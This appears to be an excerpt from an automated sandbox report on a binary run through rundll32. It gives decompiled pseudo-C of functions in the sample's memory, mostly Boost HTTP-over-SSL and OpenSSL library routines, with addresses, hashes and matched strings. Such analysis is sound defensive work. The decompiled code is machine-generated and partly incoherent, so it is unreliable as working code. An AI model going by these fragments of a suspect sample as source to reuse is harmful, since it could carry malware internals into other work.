				_t45 = E000001C31C3388103EC(_t56, _t80 - 0x70, 0x388e4e68, _t78);
				asm("inc ecx");
				return _t45;
			}












                                        0x1c3386fa220
                                        0x1c3386fa224
                                        0x1c3386fa22b
                                        0x1c3386fa232
                                        0x1c3386fa23a
                                        0x1c3386fa23e
                                        0x1c3386fa242
                                        0x1c3386fa246
                                        0x1c3386fa24a
                                        0x1c3386fa24e
                                        0x1c3386fa254
                                        0x1c3386fa257
                                        0x1c3386fa25a
                                        0x1c3386fa25f
                                        0x1c3386fa264
                                        0x1c3386fa277
                                        0x1c3386fa281
                                        0x1c3386fa287
                                        0x1c3386fa293
                                        0x1c3386fa29a
                                        0x1c3386fa29f
                                        0x1c3386fa2ab
                                        0x1c3386fa2b0
                                        0x1c3386fa2bf
                                        0x1c3386fa2cc
                                        0x1c3386fa2d8
                                        0x1c3386fa2dd
                                        0x1c3386fa2e2
                                        0x1c3386fa2e7
                                        0x1c3386fa2eb
                                        0x1c3386fa2f3
                                        0x1c3386fa2f8
                                        0x1c3386fa306
                                        0x1c3386fa313
                                        0x1c3386fa31e
                                        0x1c3386fa322
                                        0x1c3386fa333
                                        0x1c3386fa340
                                        0x1c3386fa350
                                        0x1c3386fa36e
                                        0x1c3386fa377

                                        APIs
                                        Strings
                                        • unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_stri, xrefs: 000001C3386FA30C
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/read.ipp, xrefs: 000001C3386FA317
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderInit_thread_footerRaiseThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/read.ipp$unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_stri
                                        • API String ID: 4076867389-3379936717
                                        • Opcode ID: e5d03cb0b8856392f49a17fa8538f7ec0b1675ce6ee4384ff50d5c351f911d08
                                        • Instruction ID: c03d53a7c6a75a09eefc18981dd2eced8df2c12763b3b707e11d6949903dbc8f
                                        • Opcode Fuzzy Hash: e5d03cb0b8856392f49a17fa8538f7ec0b1675ce6ee4384ff50d5c351f911d08
                                        • Instruction Fuzzy Hash: 22318D32244F8096E710CF24E8806DEB7B8F794794F509226EBAC57BA9DF38C655C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386FA0E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E000001C31C3386FA0E0(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi) {
				void* _t44;
				long long _t48;
				void* _t73;
				long long _t75;
				void* _t77;
				long long _t78;
				void* _t79;

				_t75 = __rsi;
				_t48 = _t78;
				_t77 = _t48 - 0x108;
				_t79 = _t78 - 0x200;
				 *((long long*)(_t77 - 0x78)) = 0xfffffffe;
				 *((long long*)(_t48 + 8)) = __rbx;
				 *((long long*)(_t48 + 0x10)) = __rsi;
				 *((long long*)(_t48 + 0x18)) = __rdi;
				_t54 = __rdx;
				_t73 = __rcx;
				 *((intOrPtr*)(_t79 + 0x20)) = 0;
				E000001C31C33880D880(__rcx, __rdx);
				 *((long long*)(_t79 + 0x28)) = _t48;
				E000001C31C3386FEC90(__rdx, _t73, __rdx, _t73, __rsi, _t79 + 0x20);
				if ( *((intOrPtr*)(_t79 + 0x20)) == 0) goto 0x386fa205;
				 *((long long*)(_t79 + 0x40)) = 0x3889d200;
				 *((long long*)(_t79 + 0x48)) = 0x3889d200;
				 *((long long*)(_t79 + 0x50)) = 0x3889d200;
				 *((long long*)(_t79 + 0x30)) = 0x388b1da2;
				 *((char*)(_t79 + 0x38)) = 1;
				E000001C31C33880E0E4(_t54, _t79 + 0x30, _t79 + 0x48, _t73, _t75);
				 *((long long*)(_t79 + 0x40)) = 0x3889d2a0;
				 *((long long*)(_t79 + 0x40)) = 0x388b1bc8;
				asm("movups xmm0, [esp+0x20]");
				asm("movups [esp+0x58], xmm0");
				 *((long long*)(_t79 + 0x78)) = _t75;
				 *((long long*)(_t77 - 0x80)) = _t75;
				 *((long long*)(_t77 - 0x80)) = 0xf;
				 *((long long*)(_t79 + 0x78)) = _t75;
				 *((intOrPtr*)(_t79 + 0x68)) = sil;
				E000001C31C3386FDF30(0x388b1bc8, _t54, _t77 + 0x18);
				 *0x1C3388B1C20 = "unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> >>(class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> > &,const struct boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > > &)";
				 *0x1C3388B1C28 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/write.ipp";
				 *0x1C3388B1C30 = 0x323;
				E000001C31C338703690(0x388b1bc8, _t77 + 0x88);
				E000001C31C3386FDFB0(_t44, 0, _t54, _t77 - 0x70, 0x388b1bc8, _t75);
				return E000001C31C3388103EC(_t54, _t77 - 0x70, 0x388e4e68, _t75);
			}










                                        0x1c3386fa0e0
                                        0x1c3386fa0e0
                                        0x1c3386fa0e4
                                        0x1c3386fa0eb
                                        0x1c3386fa0f2
                                        0x1c3386fa0fa
                                        0x1c3386fa0fe
                                        0x1c3386fa102
                                        0x1c3386fa106
                                        0x1c3386fa109
                                        0x1c3386fa10e
                                        0x1c3386fa112
                                        0x1c3386fa117
                                        0x1c3386fa127
                                        0x1c3386fa130
                                        0x1c3386fa13d
                                        0x1c3386fa144
                                        0x1c3386fa149
                                        0x1c3386fa155
                                        0x1c3386fa15a
                                        0x1c3386fa169
                                        0x1c3386fa176
                                        0x1c3386fa182
                                        0x1c3386fa187
                                        0x1c3386fa18c
                                        0x1c3386fa191
                                        0x1c3386fa196
                                        0x1c3386fa19a
                                        0x1c3386fa1a2
                                        0x1c3386fa1a7
                                        0x1c3386fa1b5
                                        0x1c3386fa1c2
                                        0x1c3386fa1cd
                                        0x1c3386fa1d1
                                        0x1c3386fa1e2
                                        0x1c3386fa1ef
                                        0x1c3386fa21d

                                        APIs
                                        Strings
                                        • unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<cha, xrefs: 000001C3386FA1BB
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/write.ipp, xrefs: 000001C3386FA1C6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderInit_thread_footerRaiseThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/write.ipp$unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<cha
                                        • API String ID: 4076867389-3407313142
                                        • Opcode ID: 390820797747de22af92d93a00ddc41198c1fceb6aa38a6f7fbf486f83de749d
                                        • Instruction ID: 60205626dcc4f760cecc37f86fc272b2904076b445dd067ab7dacfdaeb5d7c6d
                                        • Opcode Fuzzy Hash: 390820797747de22af92d93a00ddc41198c1fceb6aa38a6f7fbf486f83de749d
                                        • Instruction Fuzzy Hash: 97315C32644B8096F710DB54E8407CEB7B8F784784F509227EAAC47BA9DF38C645CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33872DA80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertCertificateContextProperty
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_cert_get_fname
                                        • API String ID: 665277682-2690582526
                                        • Opcode ID: 79b2cb2b5d6dc7e9a1b933f7a63a3defb7ecdf2f284955527ea9f3f5d724cd80
                                        • Instruction ID: c92f649bad1561a4d3b52587b47f58f34c1b34551b31178ad1665937fc610f86
                                        • Opcode Fuzzy Hash: 79b2cb2b5d6dc7e9a1b933f7a63a3defb7ecdf2f284955527ea9f3f5d724cd80
                                        • Instruction Fuzzy Hash: 1F2174763906C042F740DB21E805FDA63A2BB457C0F44E023DD294B795EB6DC755CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33872A45F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55registrywindowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 29%
                                        			E000001C31C33872A45F(void* __eax, signed int __ebx, signed int __ecx, void* __edx, short __esi, signed int* __rax, void* __rbx, intOrPtr* __rdx, void* __rdi, long long __rsi, void* __r8) {
				int _t23;
				void* _t31;
				void* _t33;
				signed int* _t38;
				long long _t57;
				long long _t59;
				void* _t61;

				_t57 = __rsi;
				_t38 = __rax;
				asm("adc ch, bl");
				asm("adc [esi+0x44], ah");
				 *__rdx = __ebx;
				goto 0x3872a472;
				 *__rdx = r14w;
				 *__rdx = r15d;
				if (__r8 + 1 - __rbx < 0) goto 0x3872a418;
				E000001C31C33871E120(__eax + 0x66);
				 *((long long*)(_t61 + 0x28)) = _t59 + 0x268;
				 *((long long*)(_t61 + 0x20)) = __rsi;
				r8d = 0xff;
				E000001C31C338816CC0(__ebx, __ecx ^ __ebx, __edx, _t31, _t33, _t59 + 0x268,  *_t38 | 0x00000001, _t59 + 0x10, __rsi, __r8 + 1, __rdi);
				 *((short*)(_t59 + 0x20e)) = __esi;
				if (E000001C31C33872A110(_t38, _t59 + 0x268, __rdi, __rdi) <= 0) goto 0x3872a515;
				RegisterEventSourceW(??, ??);
				if (_t38 == 0) goto 0x3872a52c;
				 *((long long*)(_t61 + 0x40)) = _t57;
				 *_t59 = _t59 + 0x10;
				 *((long long*)(_t61 + 0x38)) = _t59;
				r8d = 0;
				 *((intOrPtr*)(_t61 + 0x30)) = __esi;
				r9d = 0;
				 *((short*)(_t61 + 0x28)) = 1;
				 *((long long*)(_t61 + 0x20)) = _t57;
				ReportEventW(??, ??, ??, ??, ??, ??, ??, ??, ??);
				DeregisterEventSource(??);
				goto 0x3872a52c;
				r9d = 0x10;
				_t23 = MessageBoxW(??, ??, ??, ??);
				E000001C31C33880C290();
				return _t23;
			}










                                        0x1c33872a45f
                                        0x1c33872a45f
                                        0x1c33872a45f
                                        0x1c33872a461
                                        0x1c33872a464
                                        0x1c33872a466
                                        0x1c33872a468
                                        0x1c33872a46f
                                        0x1c33872a478
                                        0x1c33872a481
                                        0x1c33872a486
                                        0x1c33872a492
                                        0x1c33872a497
                                        0x1c33872a4a4
                                        0x1c33872a4a9
                                        0x1c33872a4b9
                                        0x1c33872a4c2
                                        0x1c33872a4ce
                                        0x1c33872a4d0
                                        0x1c33872a4de
                                        0x1c33872a4e8
                                        0x1c33872a4ed
                                        0x1c33872a4f0
                                        0x1c33872a4f4
                                        0x1c33872a4f7
                                        0x1c33872a4ff
                                        0x1c33872a504
                                        0x1c33872a50d
                                        0x1c33872a513
                                        0x1c33872a515
                                        0x1c33872a526
                                        0x1c33872a536
                                        0x1c33872a54a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$InformationObjectSourceUser$AddressDeregisterErrorHandleLastMessageModuleProcProcessRegisterReportStationWindow_invalid_parameter_noinfowcsstr
                                        • String ID: OpenSSL
                                        • API String ID: 1804357490-773864679
                                        • Opcode ID: 86ec71efb7cfdb46ea702f6dd2606ec8eb9623775bbf656fafa1927dea9f0af4
                                        • Instruction ID: 9f8a787f1a1e2ffc02524320678a3514bedaefa39c68c61d3d3677638774c5aa
                                        • Opcode Fuzzy Hash: 86ec71efb7cfdb46ea702f6dd2606ec8eb9623775bbf656fafa1927dea9f0af4
                                        • Instruction Fuzzy Hash: 4611AC33285BC086F760CF24F8146DA7365F744788F54A52AAE9A0BB56DF38C385C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33872A46B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54registrywindowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E000001C31C33872A46B(void* __eax, signed int __ebx, signed int __ecx, void* __edx, short __esi, signed int* __rax, void* __rbx, intOrPtr* __rdx, void* __rdi, long long __rsi, void* __r8) {
				int _t23;
				void* _t31;
				void* _t33;
				signed int* _t38;
				long long _t57;
				long long _t59;
				void* _t61;

				_t57 = __rsi;
				_t38 = __rax;
				 *__rdx = r15d;
				if (__r8 + 1 - __rbx < 0) goto 0x3872a418;
				E000001C31C33871E120(__eax + 0x66);
				 *((long long*)(_t61 + 0x28)) = _t59 + 0x268;
				 *((long long*)(_t61 + 0x20)) = __rsi;
				r8d = 0xff;
				E000001C31C338816CC0(__ebx, __ecx ^ __ebx, __edx, _t31, _t33, _t59 + 0x268,  *_t38 | 0x00000001, _t59 + 0x10, __rsi, __r8 + 1, __rdi);
				 *((short*)(_t59 + 0x20e)) = __esi;
				if (E000001C31C33872A110(_t38, _t59 + 0x268, __rdi, __rdi) <= 0) goto 0x3872a515;
				RegisterEventSourceW(??, ??);
				if (_t38 == 0) goto 0x3872a52c;
				 *((long long*)(_t61 + 0x40)) = _t57;
				 *_t59 = _t59 + 0x10;
				 *((long long*)(_t61 + 0x38)) = _t59;
				r8d = 0;
				 *((intOrPtr*)(_t61 + 0x30)) = __esi;
				r9d = 0;
				 *((short*)(_t61 + 0x28)) = 1;
				 *((long long*)(_t61 + 0x20)) = _t57;
				ReportEventW(??, ??, ??, ??, ??, ??, ??, ??, ??);
				DeregisterEventSource(??);
				goto 0x3872a52c;
				r9d = 0x10;
				_t23 = MessageBoxW(??, ??, ??, ??);
				E000001C31C33880C290();
				return _t23;
			}










                                        0x1c33872a46b
                                        0x1c33872a46b
                                        0x1c33872a46f
                                        0x1c33872a478
                                        0x1c33872a481
                                        0x1c33872a486
                                        0x1c33872a492
                                        0x1c33872a497
                                        0x1c33872a4a4
                                        0x1c33872a4a9
                                        0x1c33872a4b9
                                        0x1c33872a4c2
                                        0x1c33872a4ce
                                        0x1c33872a4d0
                                        0x1c33872a4de
                                        0x1c33872a4e8
                                        0x1c33872a4ed
                                        0x1c33872a4f0
                                        0x1c33872a4f4
                                        0x1c33872a4f7
                                        0x1c33872a4ff
                                        0x1c33872a504
                                        0x1c33872a50d
                                        0x1c33872a513
                                        0x1c33872a515
                                        0x1c33872a526
                                        0x1c33872a536
                                        0x1c33872a54a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$InformationObjectSourceUser$AddressDeregisterErrorHandleLastMessageModuleProcProcessRegisterReportStationWindow_invalid_parameter_noinfowcsstr
                                        • String ID: OpenSSL
                                        • API String ID: 1804357490-773864679
                                        • Opcode ID: 26c6716afbaf5caacc0329c87e0c4a82709509a95590302a30f5eef5bf49bed6
                                        • Instruction ID: f41c3bb693da8f8afa0bd2b909137c2c318ed18d4792aa9e0b61bab7331aef3c
                                        • Opcode Fuzzy Hash: 26c6716afbaf5caacc0329c87e0c4a82709509a95590302a30f5eef5bf49bed6
                                        • Instruction Fuzzy Hash: 88119A33281BC086FB609F24F8546DA7365F744798F40A52AAE5A4BB56DF38C395C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871C523 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: CoSetProxyBlanket$ole32.dll
                                        • API String ID: 1646373207-1829017490
                                        • Opcode ID: ab3a54a3bf3aca8defbc1a656ff67811e1a416d1a790af5c09cc7e4d7e90e107
                                        • Instruction ID: 468dd1d9ca81f6f55d0b3042679540b926fae8aa491fc1459529a6bb7e2d8a85
                                        • Opcode Fuzzy Hash: ab3a54a3bf3aca8defbc1a656ff67811e1a416d1a790af5c09cc7e4d7e90e107
                                        • Instruction Fuzzy Hash: 08018432245B8085FB52CF54E454B997361F7D8B98F049522CE6E87B60DF38C285C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338821BA4 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E000001C31C338821BA4(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
				void* _v8;
				char _v16;
				intOrPtr* _v32;
				char _v40;
				void* __rdi;
				void* _t17;
				intOrPtr* _t43;
				void* _t55;

				_a8 = __rbx;
				_a24 = __rsi;
				_a32 = r9w;
				_t55 = __rdx;
				if (__rdx != 0) goto 0x38821bda;
				if (__r8 == 0) goto 0x38821bda;
				if (__rcx == 0) goto 0x38821bd3;
				 *__rcx =  *__rcx & __edx;
				goto 0x38821c69;
				if (__rcx == 0) goto 0x38821be2;
				 *__rcx =  *__rcx | 0xffffffff;
				if (__r8 - 0x7fffffff <= 0) goto 0x38821bfe;
				_t17 = E000001C31C338818984(__rax);
				 *__rax = 0x16;
				E000001C31C338811BC8(_t17);
				goto 0x38821c67;
				E000001C31C338811664(__rax, __rcx,  &_v40, _a40);
				_t43 = _v32;
				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0x38821c98;
				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0x38821c7b;
				if (_t55 == 0) goto 0x38821c48;
				if (__r8 == 0) goto 0x38821c48;
				E000001C31C33880E410(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
				E000001C31C338818984(_t43);
				 *_t43 = 0x2a;
				if (_v16 == 0) goto 0x38821c67;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				return 0x2a;
			}











                                        0x1c338821ba4
                                        0x1c338821ba9
                                        0x1c338821bae
                                        0x1c338821bbc
                                        0x1c338821bc5
                                        0x1c338821bca
                                        0x1c338821bcf
                                        0x1c338821bd1
                                        0x1c338821bd5
                                        0x1c338821bdd
                                        0x1c338821bdf
                                        0x1c338821be9
                                        0x1c338821beb
                                        0x1c338821bf5
                                        0x1c338821bf7
                                        0x1c338821bfc
                                        0x1c338821c0b
                                        0x1c338821c10
                                        0x1c338821c1d
                                        0x1c338821c2f
                                        0x1c338821c34
                                        0x1c338821c39
                                        0x1c338821c43
                                        0x1c338821c48
                                        0x1c338821c52
                                        0x1c338821c59
                                        0x1c338821c60
                                        0x1c338821c7a

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                        • String ID:
                                        • API String ID: 4141327611-0
                                        • Opcode ID: 49d77ae0b775df07605cd79664d0e3d06cc87af61a22bad7434ff002173df99d
                                        • Instruction ID: 9b8565394e9a632594c5e6d64f94a7322142c37fc8aefa6bf954258b7fdb98a7
                                        • Opcode Fuzzy Hash: 49d77ae0b775df07605cd79664d0e3d06cc87af61a22bad7434ff002173df99d
                                        • Instruction Fuzzy Hash: 0541D63E2447C086FB659F50D080BE9A2A0FB81B94F34E126DEB50FAD5DB3CDA418706
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386F8800 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E000001C31C3386F8800(long long __rbx, long long* __rcx, signed long long __rdx, long long _a8, long long _a16, long long _a24) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* _t22;
				void* _t23;
				long long _t34;
				long long _t36;
				long long _t37;
				signed long long _t41;
				long long _t50;
				signed long long _t51;
				void* _t61;
				intOrPtr _t62;
				long long* _t67;

				_a16 = __rdx;
				_v56 = 0xfffffffe;
				_a8 = __rbx;
				_t51 = __rdx;
				_t67 = __rcx;
				if (__rdx != 0) goto 0x386f882e;
				goto 0x386f8880;
				if (__rdx - 0xffffffff <= 0) goto 0x386f8843;
				E000001C31C33880A170(0xffffffff);
				asm("int3");
				_t41 = _t51 << 6;
				if (_t41 - 0x1000 < 0) goto 0x386f8878;
				_t4 = _t41 + 0x27; // 0x400000000000026
				_t34 = _t4;
				if (_t34 - _t41 > 0) goto 0x386f8862;
				E000001C31C33880A170(_t34);
				asm("int3");
				E000001C31C33880B674(_t34, _t34);
				_t5 = _t34 + 0x27; // 0x27
				 *((long long*)((_t5 & 0xffffffe0) - 8)) = _t34;
				goto 0x386f8880;
				E000001C31C33880B674(_t34, _t34);
				_t50 = _t34;
				_a24 = _t50;
				E000001C31C338703A30( *_t67,  *((intOrPtr*)(_t67 + 8)), _t50, _t61);
				_t62 =  *((intOrPtr*)(_t67 + 8));
				_t36 =  *_t67;
				if (_t36 == 0) goto 0x386f88dd;
				_a16 = _t36;
				if (_t36 == _t62) goto 0x386f88ca;
				E000001C31C338704710(_t23, _t36, _t36, _t50, _t51);
				_t37 = _t36 + 0x40;
				_a16 = _t37;
				if (_t37 != _t62) goto 0x386f88b4;
				_t22 = E000001C31C3386E70C0(_t23, _t37,  *_t67,  *((intOrPtr*)(_t67 + 0x10)) -  *_t67 >> 6);
				 *((long long*)(_t67 + 0x10)) = (_t51 << 6) + _t50;
				 *((long long*)(_t67 + 8)) = (_t62 - _t36 & 0xffffffc0) + _t50;
				 *_t67 = _t50;
				return _t22;
			}

















                                        0x1c3386f8800
                                        0x1c3386f8811
                                        0x1c3386f881a
                                        0x1c3386f881f
                                        0x1c3386f8822
                                        0x1c3386f8828
                                        0x1c3386f882c
                                        0x1c3386f883b
                                        0x1c3386f883d
                                        0x1c3386f8842
                                        0x1c3386f8846
                                        0x1c3386f8851
                                        0x1c3386f8853
                                        0x1c3386f8853
                                        0x1c3386f885a
                                        0x1c3386f885c
                                        0x1c3386f8861
                                        0x1c3386f8865
                                        0x1c3386f886a
                                        0x1c3386f8872
                                        0x1c3386f8876
                                        0x1c3386f8878
                                        0x1c3386f887d
                                        0x1c3386f8880
                                        0x1c3386f8892
                                        0x1c3386f8898
                                        0x1c3386f889c
                                        0x1c3386f88a8
                                        0x1c3386f88aa
                                        0x1c3386f88b2
                                        0x1c3386f88b7
                                        0x1c3386f88bc
                                        0x1c3386f88c0
                                        0x1c3386f88c8
                                        0x1c3386f88d8
                                        0x1c3386f88e4
                                        0x1c3386f88ef
                                        0x1c3386f88f3
                                        0x1c3386f8907

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: 48a37dec6020044c0c980d13ebb934533fd7488994d19ec560aa4c994f3cfae3
                                        • Instruction ID: 550516981a63c5000f19c15da3ccf21e8470f8c47f93e8a40466c8a2767a9210
                                        • Opcode Fuzzy Hash: 48a37dec6020044c0c980d13ebb934533fd7488994d19ec560aa4c994f3cfae3
                                        • Instruction Fuzzy Hash: 9221A0B2B417D081FA14DB55B404AD966A4BB447F0F25A7229F790BBD9DF38C662C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338700570 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E000001C31C338700570(long long __rbx, long long* __rcx, signed long long __rdx, long long _a8, long long _a16, long long _a24) {
				long long _v40;
				void* _t22;
				void* _t24;
				void* _t26;
				long long _t34;
				long long _t40;
				signed int _t43;
				signed long long _t46;
				long long _t48;
				long long* _t49;
				signed long long _t50;

				_t46 = __rdx;
				_a16 = __rdx;
				_v40 = 0xfffffffe;
				_a8 = __rbx;
				_t50 = __rdx;
				_t49 = __rcx;
				if (__rdx != 0) goto 0x3870059a;
				goto 0x387005ed;
				if (__rdx - 0xffffffff <= 0) goto 0x387005af;
				E000001C31C33880A170(0xffffffff);
				asm("int3");
				_t43 = _t46 * 8;
				if (_t43 - 0x1000 < 0) goto 0x387005e5;
				_t34 = _t43 + 0x27;
				if (_t34 - _t43 > 0) goto 0x387005cf;
				E000001C31C33880A170(_t34);
				asm("int3");
				E000001C31C33880B674(_t34, _t34);
				_t6 = _t34 + 0x27; // 0x27
				 *((long long*)((_t6 & 0xffffffe0) - 8)) = _t34;
				goto 0x387005ed;
				_t22 = E000001C31C33880B674(_t34, _t34);
				_t40 = _t34;
				_a24 = _t40;
				E000001C31C338706760(_t22,  *_t49,  *((intOrPtr*)(_t49 + 8)), _t40);
				_t48 =  *_t49;
				if (_t48 == 0) goto 0x38700625;
				_t24 = E000001C31C3387006E0(_t26, _t48,  *((intOrPtr*)(_t49 + 0x10)) - _t48 >> 3);
				 *((long long*)(_t49 + 0x10)) = _t40 + _t50 * 8;
				 *((long long*)(_t49 + 8)) = _t40 + ( *((intOrPtr*)(_t49 + 8)) - _t48 >> 3) * 8;
				 *_t49 = _t40;
				return _t24;
			}














                                        0x1c338700570
                                        0x1c338700570
                                        0x1c33870057d
                                        0x1c338700586
                                        0x1c33870058b
                                        0x1c33870058e
                                        0x1c338700594
                                        0x1c338700598
                                        0x1c3387005a7
                                        0x1c3387005a9
                                        0x1c3387005ae
                                        0x1c3387005af
                                        0x1c3387005be
                                        0x1c3387005c0
                                        0x1c3387005c7
                                        0x1c3387005c9
                                        0x1c3387005ce
                                        0x1c3387005d2
                                        0x1c3387005d7
                                        0x1c3387005df
                                        0x1c3387005e3
                                        0x1c3387005e5
                                        0x1c3387005ea
                                        0x1c3387005ed
                                        0x1c3387005fc
                                        0x1c338700602
                                        0x1c338700613
                                        0x1c338700620
                                        0x1c338700629
                                        0x1c338700631
                                        0x1c338700635
                                        0x1c338700645

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: 89cfd26d850f7974e19e0b8867d82d8511561a90e7ace9660613bfa6d740ea21
                                        • Instruction ID: 5c35df123ef657386d6912eca9459672b172449ca5973a2368819cc9f894d880
                                        • Opcode Fuzzy Hash: 89cfd26d850f7974e19e0b8867d82d8511561a90e7ace9660613bfa6d740ea21
                                        • Instruction Fuzzy Hash: 8A21A9F2640BC095FA18DB66E548BCD6262B7487F0F54A7229BBD077D5DF38C2618302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3387182C8 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E000001C31C3387182C8(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, intOrPtr _a8, long long _a24) {
				void* _v8;
				char _v112;
				char _v144;
				long long _v152;
